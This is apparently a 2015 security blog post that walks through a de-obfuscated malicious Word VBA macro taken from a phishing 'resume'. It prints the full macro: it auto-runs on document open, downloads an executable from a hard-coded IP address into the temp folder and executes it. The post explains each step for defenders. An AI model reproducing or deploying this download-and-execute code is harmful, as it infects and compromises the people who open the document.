Tuesday, April 7, 2015

De-Obfuscated Malicious VBA Macro

I posted an obfuscated malicious VBA script for in a Word Document that was disguised as a Resume in a phishing email.

It was obfuscated meaning that the attacker took time to randomize the code, change variables names and declarations to be confusing, add extra unnecessary code that just confuses you, etc.

I took the time then to de-obfuscate or turn it back into read-able code that a normal legit developer might write. Let's quickly attempt to review it.

#If Win64 Then
  Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal a As Long, ByVal b As String, _
   ByVal b As String, ByVal d As String, ByVal e As String, _
   ByVal f As Long) As Long
#Else
  Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal a As Long, ByVal b As String, _
   ByVal b As String, ByVal d As String, ByVal e As String, _
   ByVal f As Long) As Long
#End If


First, the above code declares a reference or gives the program a way to execute shell command line statements by declaring an alias for the shell32.dll's ShellExecuteA function. Now you can pass in the code you want to run and it will execute (assuming the user opening this document has access to do so).

Sub Document_Open()
  DownloadAndExecute
End Sub


Call a Function called 'DownloadAndExecute' that will run immediately when the Word document is opened (assuming Macros are enabled).

Sub DownloadAndExecute()


Declare that Function called 'DownloadAndExecute' so when the document opens it can be called.

  Dim PayloadUrl = "http://80.242.123.211:888/moist.exe"
  Dim maliciousFileLocation = Environ("tmp\df.exe")


Declare variables that store where I'm doing to download a file from and where I'm going to save it to/execute it from. Note this is only going to work if the user can access that website (Cross your fingers and hope that your internet filter/proxy blocks it) and that the user can save and execute files from the folder (likely yes since it's the a temp folder).

  Dim XMLHttpRequestObject = New MSXML2.XMLHTTP30
  XMLHttpRequestObject.Open "GET", PayloadUrl, False
  XMLHttpRequestObject.send


Make a call out to the Internet to download the malicious executable file using the XML Http Request object and an HTTP GET request.

  If XMLHttpRequestObject.Status = 200 Then


If the download was successful proceed to the next steps.

   Dim fileId = FreeFile
   Open maliciousFileLocation For Binary As #fileId
   Put #fileId, , XMLHttpRequestObject.responseBody
   Close #fileId
  End If


Save the results of the download to the location you specified earlier.

  ShellExecute 0, "open", maliciousFileLocation, "", vbNullString, vbNormalFocus
End Sub


Execute the file that you just downloaded and saved. Of course the goods are actually in that executable, so you'd want to download and analyze that file at some point as well.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment